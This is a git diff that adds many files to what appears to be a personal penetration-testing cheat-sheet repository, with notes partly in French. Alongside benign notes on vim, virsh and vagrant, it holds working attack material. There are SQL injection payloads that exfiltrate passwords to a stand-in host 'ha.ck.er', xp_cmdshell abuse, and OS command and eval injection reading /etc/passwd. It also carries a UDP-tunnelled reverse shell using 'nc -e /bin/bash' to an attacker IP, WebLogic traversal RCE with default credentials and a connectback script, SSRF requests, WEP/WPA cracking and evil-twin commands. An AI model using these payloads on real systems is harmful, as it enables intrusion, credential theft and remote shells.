+INSERT INTO users (username, password, ID, privs) VALUES ('foo''', ... -> inserts "foo'" in db
+SELECT password FROM users WHERE username = 'foo'' -> unclosed quotation mark before 'foo
+
+payload: ' or 1 in (select password from users where username ='admin')--
+will show the admin's password in error msg
+
+* Out-of-Band exfiltration
+MS-SQL: OpenRowSet
+insert into openrowset('SQLOLEDB','DRIVER=(SQL Server);SERVER=ha.ck.er:80;UID=sa;PWD=p4ss','select * from foo') values (@@version)
+
+Oracle
+UTL_HTTP supports proxy servers, cookies, redirects, and authentication
+'||UTL_HTTP.request('ha.ck.er:80/'||(select username from all_users where rownum=1))--
+
+UTL_INADDR
+UTL_INADDR.GET_HOST_NAME((select password from dba_users where username='SYS')||'ha.ck.er')
+
+UTL_SMTP, UTL_TCP, UTL_FILE (read/write files) ...
+
+MySQL
+select * into outfile '\\\\ha.ck.er\share\output.txt' from users;
+
+* Conditional errors
+select 1/0 from dual where (select username from all_users where username = 'DBSNMP') = 'DBSNMP' # if user exists, this causes an error
+
+* Time-based
+MS-SQL
+'; waitfor delay '0:30:0'--
+; waitfor delay '0:30:0'--
+' waitfor delay '0:30:0'--
+
+* Privesc
+MS-SQL
+master..xp_cmdshell 'ipconfig > foo.txt' # can create out-of-band connections, uploading backdoor ...
+xp_regread / xp_regwrite
+
+select * from OpenRowSet('SQLOLEDB', 'uid=sa,pwd=foobar;Network=DBMSSOCN;Address=192.168.9.1,80;timeout=5','')
+ - port scan
+ - bruteforce creds of other databases
+ - connect back to local host and attempt to guess the password of the sa account
+ 
+MySQL
+FILE_PRIV
+stores data in plaintext files
+UDF (https://github.com/hatRiot/sql3_udf)
+
+# OS command injection
+node=a|cat /etc/passwd
+view=last5.log && dir c:\
+
+|| ping -c 30 127.0.0.1; x || ping -n 30 137.0.0.1 &
+| ping -c 30 127.0.0.1 |
+| ping -n 30 127.0.0.1 |
+& ping -c 30 127.0.0.1 &
+& ping -n 30 127.0.0.1 &
+; ping 127.0.0.1 ;
+%0a ping -c 30 127.0.0.1 %0a
+`ping 127.0.0.1`
+
+php:
+eval("$_GET['vuln']");
+?vuln=\$foo%3Dbar;%20echo%20file_get_contents('/etc/passwd')
+
+asp:
+Execute(Request("vuln"))
+?vuln=foo%3Dbar:response.write%2031337
+?vuln=foo%3Dbar:+Dim+oScript:+Set+oScript+=+Server.CreateObject("WSCRIPT.SHELL"):+Call+oScript.Run+("cmd.exe+/c+dir+>+c:\inetpub\wwwroot\dir.txt",0,True)
+
+# XML injection
+john</foo>
+john</foo><foo>
+and see if app returns error, and how app retuns your input
+
+# XPath injection (tool: https://github.com/feakk/xxxpwn, https://github.com/orf/xcat)
+informed
+' or 1=1 and 'a'='a
+' or 1=2 and 'a'='a
+
+blind
+extract the name of the current node's parent
+' or substring(name(parent::*[position()=1]),1,1)='a
+' or substring(name(parent::*[position()=1]),1,1)='b # false condition
+then cycle through each of its child nodes, extracting all of their na,es and values
+//address[position()=3]/child::node()[position()=4]/text() # node username
+//address[position()=3]/child::node()[position()=6]/text() # node password
+
+' or substring(//address[position()=3]/child::node()[position()=6]/text(),1,1)='P' and 'a'='a
+
+By cycling through every node, you can extract the entire contents of the XML
+
+detect
+' or 'a'='a
+' and 'a'='b
+ or 1=1
+ and 1=2
+(your tests for SQLi will reveal it)
+' or count(parent::*[position()=1])=0 or 'a'='b
+' or count(parent::*[position()=1])>0 or 'a'='b
+or
+1 or count(parent::*[position()=1])=0
+1 or count(parent::*[position()=1])>0
+ 
+# LDAP
+detect
+)))))
+*);cn;
+*));cn;
+*)));cn;
+...
+
+john);mail,cn,l,st,c
+
+# scanners don't work
+Vulnerabilities Detected by Scanners (p649-...)
diff --git a/Cheat Sheet/typo b/Cheat Sheet/typo
new file mode 100644
index 0000000..330d4e2
--- /dev/null
+++ b/Cheat Sheet/typo	
@@ -0,0 +1,11 @@
+# typo
+
+* typo squatting
+http://www.morningstarsecurity.com/research/urlcrazy
+https://github.com/nccgroup/typofinder
+
+* bitflipping
+http://www.security-assessment.com/files/documents/presentations/Nick_Freeman-DNS_Shenanigans-Kiwicon7_2013.pdf
+
+* rowhammer
+http://googleprojectzero.blogspot.com.au/2015/03/exploiting-dram-rowhammer-bug-to-gain.html
diff --git a/Cheat Sheet/udptunnel b/Cheat Sheet/udptunnel
new file mode 100644
index 0000000..c67497e
--- /dev/null
+++ b/Cheat Sheet/udptunnel	
@@ -0,0 +1,18 @@
+# udptunnel
+
+# bind shell listening on UDP
+victim:
+./udptunnel -s 53
+
+attacker:
+./udptunnel -c 127.0.0.1 2222 attackerip 53 127.0.0.1 22
+ssh -p 2222 127.0.0.1
+
+# reverse shell listening on UDP
+attacker:
+./udptunnel -s 53
+nc -vnlp 1234
+
+victim:
+./udptunnel -c 127.0.0.1 4321 attackerip 53 127.0.0.1 1234
+nc -vn 127.0.0.1 4321 -e /bin/bash
diff --git a/Cheat Sheet/ultravnc b/Cheat Sheet/ultravnc
new file mode 100644
index 0000000..7a62796
--- /dev/null
+++ b/Cheat Sheet/ultravnc	
@@ -0,0 +1,3 @@
+# ultravnc
+
+HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\
diff --git a/Cheat Sheet/usb b/Cheat Sheet/usb
new file mode 100644
index 0000000..f2b5419
--- /dev/null
+++ b/Cheat Sheet/usb	
@@ -0,0 +1,16 @@
+# usb
+
+* u3
+http://nullsecurity.net/tools/backdoor.html u3-pwn by nullsecurity
+
+* badusb
+https://github.com/adamcaudill/Psychson
+
+* teensy
+http://malware.cat/?p=89
+
+* rubby ducky
+http://hakshop.myshopify.com/products/usb-rubber-ducky-deluxe
+
+* usb assessment
+https://github.com/nccgroup/umap
diff --git a/Cheat Sheet/useragent b/Cheat Sheet/useragent
new file mode 100644
index 0000000..066320f
--- /dev/null
+++ b/Cheat Sheet/useragent	
@@ -0,0 +1,20 @@
+# useragent
+http://johnbokma.com/mexit/2004/04/24/changinguseragent.html
+
+about:config
+* New string -> "general.useragent.override" 
+Mozilla/5.0 (compatible; Mozilla/4.0; MSIE 6.0; Windows NT 5.1)
+Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 (fresh firefox install on WinXPProSP2Fr)
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) (ma VM winXP avec IE8)
+Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
+Mozilla/5.0 (Windows; U; Windows NT 5.1)
+
+* unset general.useragent.vendor and general.useragent.extra.firefox
+
+# google bot crawler
+Googlebot/2.1 (+http://www.googlebot.com/bot.html)
+Mozilla/5.0 (compatible; Googlebot/2.1;  http://www.google.com/bot.html)
+Googlebot/1.0 (googlebot@googlebot.com http://googlebot.com/)
+
+# detection
+http://user-agent-string.info
diff --git a/Cheat Sheet/uuid b/Cheat Sheet/uuid
new file mode 100644
index 0000000..821447e
--- /dev/null
+++ b/Cheat Sheet/uuid	
@@ -0,0 +1,6 @@
+# uuid
+
+version 1 UUID is composed of a timesteamp and the server's MAC address
+
+# version identification
+http://stackoverflow.com/a/1709834
diff --git a/Cheat Sheet/vagrant b/Cheat Sheet/vagrant
new file mode 100644
index 0000000..e47c7ae
--- /dev/null
+++ b/Cheat Sheet/vagrant	
@@ -0,0 +1,6 @@
+# vagrant
+
+mkdir v && cd v
+vagrant box add ubuntu/trusty64 --box-version 20160621.0.0
+vagrant init ubuntu/trusty64 --box-version 20160621.0.0
+
diff --git a/Cheat Sheet/vdi b/Cheat Sheet/vdi
new file mode 100644
index 0000000..44f2c61
--- /dev/null
+++ b/Cheat Sheet/vdi	
@@ -0,0 +1,4 @@
+# vdi virtuall desktop infrastructure
+
+# HP thin client
+http://blog.malerisch.net/2015/04/pwning-hp-thin-client.html
diff --git a/Cheat Sheet/vim b/Cheat Sheet/vim
new file mode 100644
index 0000000..64d4de8
--- /dev/null
+++ b/Cheat Sheet/vim	
@@ -0,0 +1,78 @@
+# vim
+
+# hex
+:%!xxd
+editing
+:%!xxd -r
+:wq
+
+# hexadecimal editors
+010editor (reset trial: rm "/home/seb/.config/SweetScape/010 Editor.ini")
+hte
+hexedit
+hexinator https://hexinator.com/
+HxD
+
+# buffers
+* horizontal
+vim -oN
+:new C-W C-N
+:sp[lit]
+
+* vertical
+vim -ON
+:vnew 
+:vs[plit]
+C-W C-V
+C-W C-O (close)
+
+# dictionnaire, spell, correction orthographe
+setlocal spell spelllang=fr
+
+]s goto next
+z= show suggestions
+
+# tabulation et espaces
+set softtabstop=2 # pour que la touche TAB indente au lien d'inserer un TAB
+set expandtab # pour que les tabulations soient converties en espaces
+set tabstop=4 # pour que les tabulations soient affichés comme 4 espaces
+set shiftwidth=2 # pour que la touche TAB indente de 2 espaces
+
+# better than ctags+cscope
+http://ruben2020.github.io/codequery/
+
+# ctags
+* Creation du fichier tags avec chemins absolus (--links pour suivre les liens symboliques)
+$ ctags -R --languages=TCL --links=yes $PWD
+
+# cscope
+* Création du fichier cscope.out (-L pour suivre les liens symboliques)
+find -L $PWD -name '*.tcl' | cscope -i- -b
+
+* Ajouter la section suivante dans ~/.vimrc
+if has("cscope")
+  "set csprg=/usr/local/bin/cscope
+  set csto=0
+  set cst
+  set nocsverb
+  " add any database in current directory
+  if filereadable("cscope.out")
+      cs add cscope.out
+  " else add database pointed to by environment
+  elseif $CSCOPE_DB != ""
+      cs add $CSCOPE_DB
+  endif
+  set csverb
+endif
+
+# Sans l'option -E, j'ai remarqué qu'il ignorait au moins un fichier .tcl, ce
+# qui est très gênant (c'est peut-être parce qu'il était encodé en UTF-8 va
+# savoir...)
+$ glimpseindex -E -o $PWD
+$ glimpse blah
+
+# vimdiff
+do -- Get changes from other window into the current window.
+dp -- Put the changes from current window into the other window.
+]c -- Jump to the next change.
+[c -- Jump to the previous change.
diff --git a/Cheat Sheet/virtd b/Cheat Sheet/virtd
new file mode 100644
index 0000000..2a4d26d
--- /dev/null
+++ b/Cheat Sheet/virtd	
@@ -0,0 +1,43 @@
+# virtd
+
+# restarting dnsmasq
+virsh net-destroy default
+virsh net-start default
+
+# disable dhcp
+virsh
+net-edit default
+<network>
+  <name>default</name>
+  <uuid>8a32d862-bd28-4cb5-84b6-cfecd954dd25</uuid>
+  <forward mode='nat'/>
+  <bridge name='virbr0' stp='on' delay='0' />
+  <mac address='52:54:00:92:24:23'/>
+  <ip address='192.168.122.1' netmask='255.255.255.0'>
+-    <dhcp>
+-      <range start='192.168.122.2' end='192.168.122.254' />
+-    </dhcp>
+  </ip>
+</network>
+
+# snapshots
+http://fedoraproject.org/wiki/Features/Virt_Live_Snapshots
+qemu-img convert -f raw -O qcow2 w2k8r2sp1x64-adpoc.img w2k8r2sp1x64-adpoc.qcow2
+
+virsh # snapshot-create w2k8r2sp1x64-adpoc
+Domain snapshot 1385009602 created
+virsh # snapshot-list w2k8r2sp1x64-adpoc
+ Name                 Creation Time             State
+------------------------------------------------------------
+ 1385009602           2013-11-21 15:53:22 +1100 running
+
+virsh # snapshot-revert w2k8r2sp1x64-adpoc --snapshotname 1385009602
+or
+virsh # snapshot-revert w2k8r2sp1x64-adpoc 1385009602 --force
+
+# dnsmasq virtd
+log-queries
+log-facility=/tmp/dnsmasq-virt.log
+cache-size=0
+#no-resolv
+#server=8.8.8.8
diff --git a/Cheat Sheet/virtualbox b/Cheat Sheet/virtualbox
new file mode 100644
index 0000000..c2b9bc9
--- /dev/null
+++ b/Cheat Sheet/virtualbox	
@@ -0,0 +1,4 @@
+# virtualbox
+
+# disable timesync between host and guest (run from normal user shell)
+vboxmanage setextradata vagrant-win7-ie11_default_1485564881211_9934 "VBoxInternal/Devices/VMMDev/0/Config/GetHostTimeDisabled" 1
diff --git a/Cheat Sheet/vlan b/Cheat Sheet/vlan
new file mode 100644
index 0000000..22b71d2
--- /dev/null
+++ b/Cheat Sheet/vlan	
@@ -0,0 +1,10 @@
+# vlan
+
+# vlan hopping 
+http://ucsniff.sourceforge.net
+http://voiphopper.sourceforge.net
+
+https://github.com/commonexploits/vlan-hopping
+frogger (www.commonexploits.com/?p=444)
+
+
diff --git a/Cheat Sheet/vms b/Cheat Sheet/vms
new file mode 100644
index 0000000..33310b6
--- /dev/null
+++ b/Cheat Sheet/vms	
@@ -0,0 +1,6 @@
+# vms virtual machines
+
+modern.ie vagrant boxes https://github.com/kadimi/wagrant
+http://bitnami.com/stacks
+modern.ie // ready to go images
+http://www.turnkeylinux.org // ready to go images
diff --git a/Cheat Sheet/vmware b/Cheat Sheet/vmware
new file mode 100644
index 0000000..773b52b
--- /dev/null
+++ b/Cheat Sheet/vmware	
@@ -0,0 +1,35 @@
+# vmware
+
+# esx users par defaut
+root, dcuiuser, vpxuser
+dcuiuser ou dcui selon les versions
+normalement dcui est locké mais ca coute rien de tester
+
+# default passwords
+http://www.kendrickcoleman.com/index.php/Tech-Blog/list-of-vmware-default-usernames-and-passwords.html
+
+# old vuln
+https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2010-002/?fid=3766
+
+# pb 
+desc: au lancement de la console vmware (vmware-1.0.8.126538):
+$ vmware
+Xlib:  extension "RANDR" missing on display ":0.0".
+/opt/vmware/server/lib/bin/vmware: symbol lookup error: /usr/lib/libgio-2.0.so.0: undefined symbol: g_thread_gettime
+
+solution :
+export VMWARE_USE_SHIPPED_GTK=force
+export LIBXCB_ALLOW_SLOPPY_LOCK=1
+
+# pb
+desc: "host clock rate change request" dans les logs
+solution: ajouter host.useFastClock = FALSE dans /etc/vmware/config 
+
+# pour recuperer le clavier
+setxkbmap -layout fr
+
+# pour connaitre les versions
+http://www.vmware.com/patch/download/
+
+# convert multi vmdk files to a single raw file
+qemu-img convert -O raw -f vmdk SpiderLabs-VRPT.vmdk blah.raw
diff --git a/Cheat Sheet/vpn b/Cheat Sheet/vpn
new file mode 100644
index 0000000..e97acca
--- /dev/null
+++ b/Cheat Sheet/vpn	
@@ -0,0 +1,9 @@
+# vpn
+
+# bonne intro vpn
+http://www.symantec.com/connect/fr/articles/penetration-testing-ipsec-vpns
+
+# client
+vpnc (client Cisco) pour examiner les paquets en reçus (et trouver son IP interne dans le champ id.data)
+Et ainsi en deduire q toutes les IP aboutissent sur le meme serveur VPN
+
diff --git a/Cheat Sheet/vuln_by_design b/Cheat Sheet/vuln_by_design
new file mode 100644
index 0000000..287e9e2
--- /dev/null
+++ b/Cheat Sheet/vuln_by_design	
@@ -0,0 +1,36 @@
+# vuln by design
+
+http://www.amanhardikar.com/mindmaps/Practice.html
+https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project
+https://github.com/google/firing-range
+
+https://hack.me/
+http://vulnhub.com/
+
+http://testasp.vulnweb.com/
+http://testphp.vulnweb.com/
+
+http://php.testsparker.com
+http://aspnet.testsparker.com
+
+demo.testfire.net
+zero.webappsecurity.com (msaccess!)
+https://github.com/cr0hn/vulnerable-node (NodeJS website)
+
+http://code.google.com/p/wavsep/ (to eval scanners)
+damn vulnerable web app
+webgoat
+bodgeit
+jarlsberg
+wackopicko
+mutillidae # pas de svn
+vicnum (online version: http://vicnum.ciphertechs.com/)
+vulnlamp (me rappelle plus)
+moth
+hacmebank https://www.owasp.org/index.php/HacmeBank http://code.google.com/p/owasp-hacmebank/
+pwn-me https://github.com/lnxg33k/pwn-me
+puzzlemall http://code.google.com/p/puzzlemall/
+
+http://g0tmi1k.blogspot.com.au/2011/03/vulnerable-by-design.html
+http://www.irongeek.com/i.php?page=security/deliberately-insecure-web-applications-for-learning-web-app-security
+https://securitythoughts.wordpress.com/2010/03/22/vulnerable-web-applications-for-learning/
diff --git a/Cheat Sheet/waf b/Cheat Sheet/waf
new file mode 100644
index 0000000..a797064
--- /dev/null
+++ b/Cheat Sheet/waf	
@@ -0,0 +1,9 @@
+# waf
+
+# detect waf
+http-waf-detect.nse
+
+# bypass waf
+http://translate.wooyun.io/2015/09/01/Bypass-WAF-Cookbook.html
+http://www.exploit-db.com/papers/17934/
+https://github.com/ironbee/waf-research
diff --git a/Cheat Sheet/webkit b/Cheat Sheet/webkit
new file mode 100644
index 0000000..59c47aa
--- /dev/null
+++ b/Cheat Sheet/webkit	
@@ -0,0 +1,17 @@
+# webkit
+
+# CoreText Mac OSX DoS
+https://news.ycombinator.com/item?id=6293824
+
+This isn't a bug inside WebKit. It's a bug inside Apples CoreText font rendering framework.
+`curl https://zhovner.com/tmp/killwebkit.html` in iTerm2 crashes
+
+Yes, I cannot reproduce the crash on OS X 10.8.4 and iTerm2 1.0.0.20130624. Maybe Apple has fixed it in the latest OS patch.
+UPDATE: It does kill Chrome 31 (individual tab) and Safari 6.0.5 (the whole browser!).
+
+https://twitter.com/daken_/status/303784082599456768 "Safari crashes on 10.8.4 for me."
+
+python -c "u'\u0647\u0020\u0488\u0488\u0488'
+
+root@kali:~# airmon-ng start wlan0
+root@kali:~# airbase-ng -e " ̷̴̐خ ̷̴̐خ ̷̴̐خ امارتيخ ̷̴̐خ" -q -c 11 mon0
diff --git a/Cheat Sheet/weblogic b/Cheat Sheet/weblogic
new file mode 100644
index 0000000..aae4b90
--- /dev/null
+++ b/Cheat Sheet/weblogic	
@@ -0,0 +1,64 @@
+# oracle weblogic
+
+# admin console
+http://host:port/console (port 7001/tcp by default)
+default admin username: weblogic
+password needs to have digit I think, so try weblogic1, welcome1, etc.
+also read about system/password (before peoplesoft tools 8.5) and system/Passw0rd
+http://gasparotto.blogspot.com.au
+
+## Oracle WebLogic Server Node Manager
+# File Traversal RCE (CVE-2010-0073)
+* preauth with Oracle WebLogic Server <= 10.3.2, postauth otherwise
+http://intevydis.blogspot.com/2010/01/oracle-weblogic-1032-node-manager-fun.html (post deleted :()
+$ openssl s_client -host 1.2.3.4 -port 5556 -ssl2
+hello blah
++OK Node manager v10.3 started
+DOMAIN xyz
+-ERR I/O error while reading domain directory
+GETNMLOG
+java.io.FileNotFoundException: Domain directory ‘C:\OracleMiddleware\wl_server\10.3\common\nodemanager’ invalid
+DOMAIN wl_server
++OK Current domain set to ‘wl_server’
+EXECSCRIPT ../../../../../../../../Windows/System32/ping.exe
+-ERR 1
+GETNMLOG
+<help usage of ping>
+
+* postauth
+domain <domain> #can be found in /dms or /console or in URLs or uddi (maybe?)
+user weblogic
+pass Welcome1
+execscript ../../../../../../../../../../../../../../../bin/dispuid
+getnmlog
+
+# more info about Node Manager (default port 5556)
+http://pietermalan.blogspot.fr/2012/04/interacting-with-nodemanager.html
+Node Manager utility is used to start stop server instances remotely
+default domains wl_server and medrec
+
+# UNC Path RCE
+domain <domain> \\attackerip\share
+execscript connectback.sh
+
+# command line client to remotely deploy webapp (i think it calls /bea_wls_cluster_internal/DeploymentService)
+http://docs.oracle.com/cd/E13222_01/wls/docs90/deployment/wldeployer.html
+http://docs.oracle.com/cd/E15051_01/wls/docs103/deployment/deploy.html
+
+# default deployed apps on weblogic
+/dms
+/_async
+/bea_wls_cluster_internal
+/bea_wls_deployment_internal
+/bea_wls_internal
+/uddi
+/uddiexplorer
+/inspection.wsil
+
+# UDDI
+SSRF: $ curl -s http://vuln/uddiexplorer/SearchPublicRegistries.jsp -d 'operator=http%3A%2F%2F127.0.0.1:22%2Fwoot&rdoSearch=name&txtSearchname=asdf&btnSubmit=Search'
+server expects SOAP response (see uddi wdsl on internet)
+
+# misc
+LSV hsc sur rce via le protocole T3
+https://blog.netspi.com/decrypting-weblogic-passwords/
diff --git a/Cheat Sheet/webrtc b/Cheat Sheet/webrtc
new file mode 100644
index 0000000..4ce5cf8
--- /dev/null
+++ b/Cheat Sheet/webrtc	
@@ -0,0 +1,3 @@
+# webrtc STUN
+
+https://diafygi.github.io/webrtc-ips/
diff --git a/Cheat Sheet/webservice b/Cheat Sheet/webservice
new file mode 100644
index 0000000..d47c0c9
--- /dev/null
+++ b/Cheat Sheet/webservice	
@@ -0,0 +1,5 @@
+# webservice ws
+
+https://www.isecpartners.com/tools/application-security/wsmap.aspx
+https://www.isecpartners.com/tools/application-security/wsbang.aspx
+http://ws-attacks.org/index.php/Main_Page
diff --git a/Cheat Sheet/webshells b/Cheat Sheet/webshells
new file mode 100644
index 0000000..4b0af1e
--- /dev/null
+++ b/Cheat Sheet/webshells	
@@ -0,0 +1,16 @@
+# webshells
+
+https://github.com/hatRiot/clusterd.git
+http://www.securityaegis.com/web-shells-for-all/
+https://github.com/epinna/Weevely
+
+# tunnel TCP over HTTP
+reDuh
+https://github.com/sensepost/reGeorg
+http://www.secforce.com/research/tunna.html
+
+# php in jpg
+https://github.com/d0lph1n98/Defeating-PHP-GD-imagecreatefromjpeg
+
+# javascript
+https://github.com/Den1al/JSShell/
diff --git a/Cheat Sheet/websphere b/Cheat Sheet/websphere
new file mode 100644
index 0000000..4d3d58e
--- /dev/null
+++ b/Cheat Sheet/websphere	
@@ -0,0 +1,42 @@
+# websphere
+
+# admin console (to confirm)
+https://<ip>:9043/ibm/console/
+
+# {xor}Lz4sLCgwLTs=
+python -c "print(''.join([chr(ord(c) ^ ord('_')) for c in 'Lz4sLCgwLTs='.decode('base64')]))"
+
+# xmlaccess
+http://192.168.122.238:10039
+
+* Export.xml
+Should exports users from LDAP
+<request
+    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
+    xsi:noNamespaceSchemaLocation="PortalConfig_1.4.xsd"
+    type="export"
+    export-users="true">
+    
+    <portal action="http://github.com/export"/>
+</request>
+
+* deploy a new malicious portlet
+see vm_deploy.xml (based on template DeployPortlet.xml)
+/wps/PA_WPS_WSTest/
+
+pb if cluster setup, server will NOT start new portlet (error msg like "wait for synchronisation of all nodes to be done")
+ConfigEngine.sh activate-portlets (or xml-samples/ActivatePortlet.xml)
+
+maybe a solution is to update an existing portlet like Welcome (need to test)
+
+# blog d'un fanboy
+http://codyburleson.com/2013/01/24/xmlaccess-samples-in-ibm-websphere-portal/
+
+# links
+http://www-947.ibm.com/support/entry/portal/documentation/software/websphere/websphere_portal
+http://www.ibm.com/developerworks/websphere/zones/portal/proddoc/
+http://www-10.lotus.com/ldd/portalwiki.nsf/xpViewCategories.xsp?lookupName=Product%20Documentation
+http://www-10.lotus.com/ldd/portalwiki.nsf/xpDocViewer.xsp?lookupName=IBM+WebSphere+Portal+8+Product+Documentation#action=openDocument&content=catcontent&ct=prodDoc
+
+# disable unused apps
+http://www-01.ibm.com/support/docview.wss?uid=swg21472871
diff --git a/Cheat Sheet/wget b/Cheat Sheet/wget
new file mode 100644
index 0000000..213c88a
--- /dev/null
+++ b/Cheat Sheet/wget	
@@ -0,0 +1,7 @@
+# wget
+
+# ne pas essayer de telecharger robots.txt 
+-e robots=off
+
+# definir le nombre de retry
+-t 5
diff --git a/Cheat Sheet/whois b/Cheat Sheet/whois
new file mode 100644
index 0000000..80e1abf
--- /dev/null
+++ b/Cheat Sheet/whois	
@@ -0,0 +1,16 @@
+# whois
+
+$ whois -h whois.ripe.net example.com
+[...]
+nserver NETDNS01.SYSTALIANS.EU 217.109.14.181
+
+$ whois 217.109.14.181
+[...]
+tech-c Ljc10-RIPE
+
+$ whois -h whois.ripe.net Ljc10-RIPE
+person: John Smith
+
+# recherche inverse sur le contact technique
+$ whois -h whois.ripe.net -i tech-c Ljc10-RIPE
+
diff --git a/Cheat Sheet/wifi b/Cheat Sheet/wifi
new file mode 100644
index 0000000..9f1d81d
--- /dev/null
+++ b/Cheat Sheet/wifi	
@@ -0,0 +1,100 @@
+# wifi
+
+https://github.com/routerkeygen
+
+# harvest valuable info in wpa enterprise traffic
+Creap http://www.shellntel.com/blog/2015/9/23/assessing-enterprise-wireless-networks https://github.com/Shellntel/scripts.git
+EAPeak https://github.com/securestate/eapeak
+
+# WPS
+tshark -i wlan1mon -Y 'wps.wifi_protected_setup_state == 2' # check if wps is enabled
+https://github.com/SilentGhostX/HT-WPS-Breaker (automates Piexiewps Reaver Bully Aircrack-ng)
+https://github.com/wiire/pixiewps
+http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/ (default wps pins)
+
+# rogue ap
+sensepost/mana hostapd-mana
+
+# wpa2 crack pass without AP
+http://n0where.net/wpa2-halfhandshake-crack/
+
+# wepbuster
+outil pour casser du wep automatiquement
+
+# bbox (bouygues)
+http://www.korben.info/les-bbox-de-bouygues-telecom-sont-toutes-piratables-facilement-en-plus.html
+
+# fern-wifi-cracker (blackarch)
+gui based wireless security auditing application that uses the aircrack-ng suite of tools
+
+# create an evil wireless access point
+http://www.offensive-security.com/kali-linux/kali-linux-evil-wireless-access-point/
+
+# aircrack
+* WPA
+airodump-ng -c 11 -w neuf --bssid 00:17:11:22:AB:CD mon
+aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 -D mon0
+aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap
+
+* WEP
+airmon-ng start wlan0 11
+ifconfig mon0 down
+macchanger -m mon0
+ESSID=
+BSSID=
+SRC= <- use my MAC or any random one, if fake auth fails maybe MAC whitelisting is in place
+ifconfig mon0 up
+airodump-ng -i -w blah -c 11 --bssid $BSSID mon0
+aireplay-ng -1 0 -e $ESSID -a $BSSID -h $SRC -D mon0
+// or
+aireplay-ng -1 6000 -o 1 -q 10 -e $ESSID -a $BSSID -h $SRC -D mon0 
+aireplay-ng -3 -a $BSSID -h $SRC -D mon0
+
+// skip fake auth if spoofing already associated client or see aireplay-ng -2 to replay ARP issued by associated client
+
+aircrack -w path/to/wordlist.dic blah*.ivs
+
+# fake auth OK looks like:
+12:33:17  Sending Authentication Request (Open System)
+
+12:33:19  Sending Authentication Request (Open System) [ACK]
+12:33:19  Authentication successful
+12:33:19  Sending Association Request [ACK]
+12:33:19  Association successful :-) (AID: 1)
+
+12:33:29  Sending keep-alive packet [ACK]
+12:33:39  Sending keep-alive packet [ACK]
+12:33:39  Got a deauthentication packet! (Waiting 3 seconds)
+
+12:33:42  Sending Authentication Request (Open System) [ACK]
+12:33:43  Authentication successful
+12:33:43  Sending Association Request [ACK]
+12:33:44  Association successful :-) (AID: 1)
+
+12:33:54  Sending keep-alive packet [ACK]
+12:34:04  Sending keep-alive packet [ACK]
+...
+
+# crack WEP key
+aircrack-ng -b 00:14:6C:7E:40:80 output*.cap
+or
+aircrack-ng -K -b 00:14:6C:7E:40:80 output*.cap # invokes the FMS/Korek method
+
+# other techniques to crack WEP
+http://ha.cker.ir/2013/06/how-to-hack-wifi-protected-with-wep/
+
+# evil twin
+airbase-ng -a 00:09:5B:6F:64:1E --essid "Elroy" -c 11 mon0
+
+iwconfig wlan0 txpower 27
+iwconfig wlan0 txpower 30
+
+# find connected ap on windows
+netsh wlan show all | more
+
+# 5gz
+airmon-ng start wlan1 36
+iwlist wlan1mon frequency
+
+airodump -b a ...
+
diff --git a/Cheat Sheet/windbg b/Cheat Sheet/windbg
new file mode 100644
index 0000000..b984702
--- /dev/null
+++ b/Cheat Sheet/windbg	
@@ -0,0 +1,11 @@
+# windbg
+
+gflags /i iexplore.exe +hpa +ust
+gflags /p /enable iexplore.exe
+
+# must disable gflags before doing heap spray
+gflags /i iexplore.exe -hpa -ust
+gflags /p /disable iexplore.exe
+!peb
+!heap -stat -h
+s -a 0 L?7fffffff "woot"
diff --git a/Cheat Sheet/windows b/Cheat Sheet/windows
new file mode 100644
index 0000000..d1eb714
--- /dev/null
+++ b/Cheat Sheet/windows	
@@ -0,0 +1,438 @@
+# windows
+
+# end of life / support
+http://support.microsoft.com/lifecycle/search/default.aspx?
+
+# logging
+http://sniperforensicstoolkit.squarespace.com/storage/logging/Windows%20Logging%20Cheat%20Sheet%20v1.1.pdf
+
+# version
+# http://en.wikipedia.org/wiki/Comparison_of_Microsoft_Windows_versions
+# http://en.wikipedia.org/wiki/Ver_(command)
+4.0 NT4
+5.0 2000
+5.1 XP
+5.2 2003 & 2003 R2 or XP x64
+6.0 Vista or 2008
+6.1 Windows 7 or 2008 R2
+6.2 Windows 8 or Windows Server 2012
+6.3 Windows 8.1 or Windows Server 2012 R2
+
+# hashes
+LM: DES
+NT: MD4
+
+# comptes
+501 (0x1f5) -> compte guest
+
+# active directory
+controleur de domaine se reperent avec les ports ouverts suivants: 88, 389, 636, 53, 42
+
+* pour avoir la liste des DC
+nmblookup 'EXAMPLE#1c'
+nbquery (http://www.skullsecurity.org/wiki/index.php/Nbquery)
+dig @nameserver _ldap._tcp.dc._msdcs.example.com. SRV 
+nltest /dclist:EXAMPLE
+nslookup -type=srv _ldap...
+
+* pour avoir le PDC
+nmblookup 'EXAMPLE#1b' #http://ubiqx.org/cifs/Appendix-C.html
+dig @nameserver _ldap._tcp.pdc._msdcs.example.com. SRV
+nltest /dcname:EXAMPLE
+
+* DNS "zone transfer" (http://carnal0wnage.attackresearch.com/2013/10/ad-zone-transfers-as-user.html)
+dns-dump.ps1 -zone projectmentor.net -dc dc1
+powershell -ep bypass -f dnsdump.ps1 -zone projectmentor.net -dc dc1 [-csv]
+
+* recon without admin rights
+https://adsecurity.org/?p=2535
+
+* rm -fr
+rmdir /s /q c:\windows\temp\tw 
+
+* tasklist
+taskkill /F /IM "cmd.exe" # killall
+
+* misc
+set logon server
+dsquery * domainroot -filter "&(objectCategory=computer)" -attr name -l -limit 0 # list all hosts in the domain
+
+* samdump http://sh4ka.fr/?p=1850
+bin/samba-tool join sh4kaindustry.local DC -U 'amoulu%test1234!'
+bin/samba-tool samdump
+
+* http://www.linuxposts.com/samba/36957-samba-samba-4-ad-native-mode.html
+net join bdc <domain>
+net samdump
+
+* schtasks
+schtasks /create /ru system /tn "blah" /tr "C:\temp\tw\scan.bat" /sc once /st 14:00:00  #or try to create it w/out any scheduling
+schtasks /run /tn "blah"
+schtasks /end /tn "blah"
+schtasks /delete /tn "blah"
+
